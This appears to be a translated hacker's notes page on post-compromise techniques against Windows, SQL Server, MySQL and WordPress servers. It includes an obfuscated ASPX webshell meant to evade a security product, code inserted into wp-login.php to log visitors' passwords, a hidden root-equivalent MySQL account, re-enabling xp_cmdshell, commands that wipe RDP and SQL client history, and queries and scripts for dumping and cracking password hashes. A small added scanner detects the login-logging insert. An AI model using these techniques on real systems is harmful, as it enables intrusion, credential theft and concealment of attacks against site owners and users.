-----------------------------
Statement to drop the extended stored procedure xp_cmdshell:

exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore (re-enable) xp_cmdshell:

exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

Check whether the extended stored procedure exists:

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

A result of 1 means it is present.

Restore xp_cmdshell and check again in one batch (the procedure is sp_addextendedproc; the original note wrote it as addextendedproc, which does not exist):

exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

A result of 1 means it worked. Otherwise xplog70.dll itself has been removed (it normally lives in the SQL Server Binn directory); upload a copy and register it by full path:

exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\winnt\system32\xplog70.dll'

SQL statement to close xp_cmdshell again:

sp_dropextendedproc 'xp_cmdshell'
-------------------------
Clear the RDP (3389) connection history with one built-in command:

reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file under the current account's My Documents folder.

View the current user's privileges in MySQL:

show grants for current_user;

The following statements create an account with the same privileges as root. Anyone who has taken over a site has run into this: the MySQL root account can only connect locally and refuses remote connections. The statements below solve that by creating a user itpro with password 123 and root-equivalent privileges, allowed to connect from any host, so you can work on the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION;

(GRANT ... IDENTIFIED BY only works on MySQL 5.x; it is deprecated in 5.7 and removed in 8.0, where the CREATE USER line must come first and GRANT takes no password. Either way the account takes effect immediately; account-management statements do not need FLUSH PRIVILEGES.)
One-line ASPX backdoor that gets past Safedog (安全狗). It reads the request body as a .NET assembly (the cookie named 你的密码, "your password", carries the byte length and acts as the access password), loads it, and instantiates its class c with the page object; any error is swallowed, so a probe just gets a blank page:

<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

Logging WordPress login passwords from a webshell

Log WordPress login credentials from a webshell for further social engineering. Add the following at around line 539 of wp-login.php:

// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
    @fwrite(fopen('pwd.txt',"a+"),$txt);
}
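The same insert seen from the defender's side. This is an added example, not part of the original post: a small scanner that flags the pattern above in PHP source, a read of the login POST fields (log/pwd) followed within a few lines by a sink that writes or sends data. The two sample sources are constructed inline (one with the insert, one clean); the window size and the sink list are assumptions of this example, not anything WordPress itself checks.

```python
"""Scan PHP source for login-field reads that feed a nearby file/network sink.

Added example: the sample sources are constructed for the demo, and the
regexes and the `window` default are assumptions, not WordPress's own checks.
"""
import re
from typing import Dict, List

# Reads of the WordPress login form fields.
CRED_READ = re.compile(r"\$_(POST|REQUEST)\s*\[\s*['\"](log|pwd)['\"]\s*\]")
# Sinks that would put a captured credential on disk or send it off the box.
CRED_SINK = re.compile(
    r"\b(fwrite|fputs|file_put_contents|error_log|mail|curl_exec|fsockopen)\s*\("
)

# Constructed sample: a stock-looking login branch with the post's insert in it.
TAMPERED_WP_LOGIN = """\
case 'login':
    $secure_cookie = '';
    // log password
    $log_user=$_POST['log'];
    $log_pwd=$_POST['pwd'];
    $log_ip=$_SERVER["REMOTE_ADDR"];
    $txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
    $txt=$txt."\\r\\n";
    if($log_user&&$log_pwd&&$log_ip){
        @fwrite(fopen('pwd.txt',"a+"),$txt);
    }
    if ( isset( $_POST['log'] ) ) {
        $user = wp_signon( array(), $secure_cookie );
    }
"""

# Constructed sample with credential reads but no sink near them.
CLEAN_WP_LOGIN = """\
case 'login':
    $secure_cookie = '';
    if ( isset( $_POST['log'] ) ) {
        $user = wp_signon( array(), $secure_cookie );
    }
    break;
"""


def find_credential_sinks(php_source: str, window: int = 12) -> List[Dict]:
    """One finding per sink line that has a login-field read within `window` lines before it."""
    lines = php_source.splitlines()
    read_lines = [n for n, text in enumerate(lines, 1) if CRED_READ.search(text)]
    findings = []
    for n, text in enumerate(lines, 1):
        if not CRED_SINK.search(text):
            continue
        nearby = [r for r in read_lines if 0 < n - r <= window]
        if nearby:
            findings.append({"sink_line": n, "sink": text.strip(), "reads": nearby})
    return findings


if __name__ == "__main__":
    for name, src in (("tampered", TAMPERED_WP_LOGIN), ("clean", CLEAN_WP_LOGIN)):
        print(name, find_credential_sinks(src))
```

Run it over the real wp-login.php (and wp-includes/user.php, where wp_signon reads the same fields) rather than the samples; a stock file produces no findings because it never writes the fields anywhere. A diff against the matching release tarball is the stronger check, but this catches the insert without needing the pristine copy.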
The logging code fires when action=login; you can also put it in the default branch of the switch ... case statement. Just search for case 'login' and insert it right below. The captured passwords are written to pwd.txt.

Actually, modifying wp-login.php is not a good approach, since it is easy to spot (a file-integrity check or a diff against the stock release shows it at once); there are other ways, noted here for the record.

Bypassing Safedog with the IIS 6 file-parsing vulnerability (a file whose name contains ".asp;" is executed as ASP regardless of the final extension):

antian365.asp;antian365.jpg

Grabbing hashes from various database types to crack the highest-privilege password
1. SQL Server 2000

SELECT password from master.dbo.sysxlogins where name='sa'

0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash

Crack the upper-case hash in Cain and Abel first (it is case-insensitive, so the keyspace is much smaller), then work out the case-sensitive hash from that result.

SQL Server 2005:

SELECT password_hash FROM sys.sql_logins where name='sa'

0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F

0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash

Crack the case-sensitive hash in Cain; try brute-force and dictionary-based attacks.

Update, following Bernardo's comments: use the function fn_varbintohexstr() to cast the password column to a hex string, e.g.

select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MySQL:
In MySQL you can generate hashes internally using the PASSWORD(), MD5(), or SHA1() functions. PASSWORD() is the function used for MySQL's own user authentication system. It returns a 16-character string for MySQL versions prior to 4.1, and a 41-character string (based on a double SHA-1 hash) for versions 4.1 and up. MD5() is available from MySQL version 3.23.2 and SHA1() was added later in 4.0.2.

* mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

* mysql >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user

The hashes can be cracked in Cain and Abel.
Postgres:

Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser (usually called "postgres" or "pgsql") to read this table.

select usename, passwd from pg_shadow;

 usename  |               passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396

Use MDCrack to crack these hashes (the stored value is md5(password + username), which is why the username is appended to every candidate):

$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:

select name, password, spare4 from sys.user$

Hashes can be cracked using Cain and Abel or thc-orakelcrackert11g.

More on Oracle later, I am a bit bored....
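To make the hash layouts above concrete, here is an added example (not from the original post or from any of the tools it names) that parses the SQL Server 0x0100 format into header, salt and digest(s), rebuilds each format from a candidate password, and runs a tiny offline dictionary check. The constructions are the documented ones: SQL Server 2000 is 0x0100, a 4-byte salt, SHA1(UTF-16LE(password) + salt) and SHA1(UTF-16LE(UPPER(password)) + salt); SQL Server 2005 drops the second digest; MySQL 4.1+ is "*" followed by upper-case hex of SHA1(SHA1(password)); PostgreSQL is "md5" followed by hex of MD5(password + username). The pre-4.1 MySQL 16-character scheme is not implemented. The two sa hashes quoted above are used only to exercise the parser; the candidate password list and the salt reused for the demo are constructed.

```python
"""Parse and verify the database password-hash formats listed in the notes.

Added example. Formats are the documented ones for each product; the sample
candidate list and the demo salt are constructed for this block.
"""
import hashlib
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass
class MssqlHash:
    version: str            # "2000" or "2005"
    salt: bytes             # 4 bytes following the 0x0100 header
    hash_cs: bytes          # SHA1 over the case-sensitive password + salt
    hash_uc: Optional[bytes]  # SHA1 over UPPER(password) + salt, SQL Server 2000 only


def parse_mssql(hexstr: str) -> MssqlHash:
    """Split a 0x0100... value from sysxlogins / sys.sql_logins into its parts."""
    h = hexstr.strip().lower()
    if h.startswith("0x"):
        h = h[2:]
    raw = bytes.fromhex(h)
    if raw[:2] != b"\x01\x00":
        raise ValueError("not a 0x0100 SQL Server hash")
    salt, body = raw[2:6], raw[6:]
    if len(body) == 40:        # two SHA1 digests: SQL Server 2000
        return MssqlHash("2000", salt, body[:20], body[20:])
    if len(body) == 20:        # one SHA1 digest: SQL Server 2005
        return MssqlHash("2005", salt, body, None)
    raise ValueError(f"unexpected length {len(raw)} bytes")


def mssql_digest(password: str, salt: bytes) -> bytes:
    """SHA1(UTF-16LE(password) || salt), the primitive both SQL Server versions use."""
    return hashlib.sha1(password.encode("utf-16-le") + salt).digest()


def make_mssql(password: str, salt: bytes, version: str = "2005") -> str:
    """Build a hash in the same layout, to sanity-check the parser or seed a test."""
    body = mssql_digest(password, salt)
    if version == "2000":
        body += mssql_digest(password.upper(), salt)
    return "0x" + (b"\x01\x00" + salt + body).hex().upper()


def verify_mssql(password: str, hexstr: str) -> bool:
    """Check a candidate against the case-sensitive digest (2000 and 2005)."""
    p = parse_mssql(hexstr)
    return mssql_digest(password, p.salt) == p.hash_cs


def verify_mssql_uppercase(password: str, hexstr: str) -> bool:
    """SQL Server 2000 only: the case-insensitive digest the notes say to crack first."""
    p = parse_mssql(hexstr)
    return p.hash_uc is not None and mssql_digest(password.upper(), p.salt) == p.hash_uc


def quick_check(candidates: Iterable[str], hexstr: str) -> Optional[str]:
    """Minimal dictionary attack: first candidate whose case-sensitive digest matches."""
    p = parse_mssql(hexstr)
    for c in candidates:
        if mssql_digest(c, p.salt) == p.hash_cs:
            return c
    return None


def mysql41_hash(password: str) -> str:
    """MySQL >= 4.1 PASSWORD(): '*' + hex(SHA1(SHA1(pw))) in upper case."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def postgres_md5_hash(password: str, username: str) -> str:
    """PostgreSQL pg_shadow value: 'md5' + hex(MD5(pw || username))."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()


def verify_postgres(password: str, username: str, stored: str) -> bool:
    return postgres_md5_hash(password, username) == stored


# The two sa hashes quoted in the notes above.
SA_2000 = ("0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341"
           "2FD54D6119FFF04129A1D72E7C3194F7284A7F3A")
SA_2005 = "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F"

if __name__ == "__main__":
    for h in (SA_2000, SA_2005):
        p = parse_mssql(h)
        print(p.version, "salt", p.salt.hex().upper(), "hash", p.hash_cs.hex().upper())
    # Constructed demo: reuse the 2000 salt with a known password and crack it back.
    demo = make_mssql("Secret1", bytes.fromhex("34767D5C"), "2000")
    print(quick_check(["123456", "sa", "Secret1"], demo))
```

The two-digest layout is the whole reason the notes say to crack the upper-case hash first: that digest is case-insensitive, so once a dictionary or brute-force hit comes back only the 2^n case variants of that one word have to be tried against the case-sensitive digest.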
Enabling xp_cmdshell in SQL Server 2005/2008 (needs ALTER SETTINGS, i.e. sysadmin or serveradmin; the current state is visible in sys.configurations as the value_in_use of 'xp_cmdshell'):

-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing the SQL Server 2008 connection history (be sure to back up before clearing). What these steps remove is the list of servers remembered by Management Studio / Query Analyzer (the "recent servers" MRU data), not the SQL Server error log.

If SQL Express 2008 is installed on Windows Server 2008 Standard, delete this file:

X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:

SQL Server 2005: delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat

SQL Server 2000: clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51
Windows 2008 file-permission changes

1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98

Step 1: look in the right-click menu for "管理员取得所有权" (Take ownership as administrator). If it is not there, import the following .reg file. It adds that entry to the context menu of every file and of .exe files; the entry runs takeown to take ownership of the selected file and then icacls to grant the Administrators group full control:

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"